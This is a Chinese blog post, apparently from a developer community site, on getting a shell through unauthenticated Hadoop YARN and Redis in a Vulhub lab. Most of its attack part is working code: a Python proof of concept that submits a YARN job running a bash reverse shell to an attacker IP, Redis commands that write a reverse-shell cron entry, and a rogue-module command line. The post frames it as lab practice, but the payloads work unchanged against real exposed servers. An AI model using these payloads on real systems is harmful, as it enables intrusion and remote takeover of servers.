Hadoop未授权GetShell

本文涉及的产品
云数据库 Redis 版,社区版 2GB
推荐场景:
搭建游戏排行榜
简介: Hadoop未授权GetShell

网络架构图讲解:

注:下面均为本地虚拟机ip,仅仅模拟内网环境,漏洞环境vulhub搭建

Hadoop服务器和个人PC同处与局域网,所以他们两个是通的,

个人PC和vps 是NAT模式,也是相通,Hadoop和VPS 网络不通。

Vulhub靶场下载地址

git clone https://github.com/vulhub/vulhub.git

下载docker 和 docker-compose

启动漏洞

docker-compose up -d

#1 第一步嘛 肯定信息收集一波

端口扫描


#2 发现漏洞

http://192.168.1.59:8088/ws/v1/cluster/apps/new-application

640.png

nice,good,666

#3 反弹shell

VMware 有一个端口映射,做一个外道内映射就完美解决问题

当访问宿主机8888端口 转发到VPS 8888端口

nc 开启监听

使用python 去攻击 下面为poc

import requests
target = 'http://192.168.1.59:8088/'
lhost = '192.168.1.42' # 攻击方的IP地址
url = target + 'ws/v1/cluster/apps/new-application'
resp = requests.post(url)
app_id = resp.json()['application-id']
url = target + 'ws/v1/cluster/apps'
data = {
    'application-id': app_id,
    'application-name': 'get-shell',
    'am-container-spec': {
        'commands': {
            'command': '/bin/bash -i >& /dev/tcp/%s/8888 0>&1' % lhost,
        },
    },
    'application-type': 'YARN',
}
requests.post(url, json=data)

成功反弹shell

640.png

使用goby扫描 发现redis未授权,这个工具非常厉害,无需安装环境,即可进行大部分漏洞复现


   

写反弹shell

set  shell  "\n* * * * * bash -i >& /dev/tcp/192.168.1.42/8888 0>&1\n"
config set dir /var/spool/crontabs/
config set dbfilename root
save

第二种

https://github.com/vulhub/redis-rogue-getshell

python3 redis-master.py -r target-ip -p 6379 -L local-ip -P 8888 -f RedisModulesSDK/exp.so -c "id"


相关实践学习
基于Redis实现在线游戏积分排行榜
本场景将介绍如何基于Redis数据库实现在线游戏中的游戏玩家积分排行榜功能。
云数据库 Redis 版使用教程
云数据库Redis版是兼容Redis协议标准的、提供持久化的内存数据库服务,基于高可靠双机热备架构及可无缝扩展的集群架构,满足高读写性能场景及容量需弹性变配的业务需求。 产品详情:https://www.aliyun.com/product/kvstore     ------------------------------------------------------------------------- 阿里云数据库体验:数据库上云实战 开发者云会免费提供一台带自建MySQL的源数据库 ECS 实例和一台目标数据库 RDS实例。跟着指引,您可以一步步实现将ECS自建数据库迁移到目标数据库RDS。 点击下方链接,领取免费ECS&RDS资源,30分钟完成数据库上云实战!https://developer.aliyun.com/adc/scenario/51eefbd1894e42f6bb9acacadd3f9121?spm=a2c6h.13788135.J_3257954370.9.4ba85f24utseFl
相关文章
|
7月前
|
SQL 安全 数据可视化
Apache Superset 未授权访问漏洞(CVE-2023-27524)
Apache Superset 存在未授权访问漏洞,攻击者可利用该漏洞验证和访问未经授权的资源。
141 1
|
7月前
|
安全 Java 数据安全/隐私保护
ZooKeeper 未授权访问漏洞利用
ZooKeeper 未授权访问漏洞利用
1309 1
|
8月前
|
分布式计算 Hadoop Linux
五十七、centos创建hadoop用户(修改hadoop用户密码,目录赋予hadoop用户权限等......)
五十七、centos创建hadoop用户(修改hadoop用户密码,目录赋予hadoop用户权限等......)
275 0
|
11月前
|
分布式计算 Java Hadoop
hadoop实现文件的上传下载
hadoop实现文件的上传下载
|
分布式计算 资源调度 安全
|
机器学习/深度学习 SQL 分布式计算
配置 HDFS-创建 Kerberos 对应的账户设置 Keytab 文件|学习笔记
快速学习配置 HDFS-创建 Kerberos 对应的账户设置 Keytab 文件
1592 0
|
分布式计算 Hadoop Java
|
Web App开发 网络安全
HDFS的WEB页面访问常见问题
HDFS的WEB UI管理页面 50070 端口 无法访问解决办法! 本文基于HADOOP-3..1.0,Cecntos7.0环境下进行测试,所以遇到很多新鲜的问题; 特别注意:HaDoop3.0之前web访问端口是50070   hadoop3.0之后web访问端口为9870 学习建议:倘若按照多数人的配置进行配置且配置语法没有问题,遇到错误时,尽量不要先进行配置的更改,先考虑其他客观因素,比如防火墙、SELinux等等      另外尤其要注意版本问题。
3137 0
|
分布式计算 资源调度 安全
Hadoop Yarn RPC未授权访问漏洞
Hadoop Yarn RPC未授权访问漏洞
1541 0
Hadoop Yarn RPC未授权访问漏洞
|
分布式计算 安全 Hadoop
你的数据安全么?Hadoop再曝安全漏洞| 黑客利用Hadoop Yarn资源管理系统未授权访问漏洞进行攻击
4月30日,阿里云发现,俄罗斯黑客利用Hadoop Yarn资源管理系统REST API未授权访问漏洞进行攻击。 Hadoop是一款由Apache基金会推出的分布式系统框架,它通过著名的 MapReduce 算法进行分布式处理,Yarn是Hadoop集群的资源管理系统。
7464 0

热门文章

最新文章

相关实验场景

更多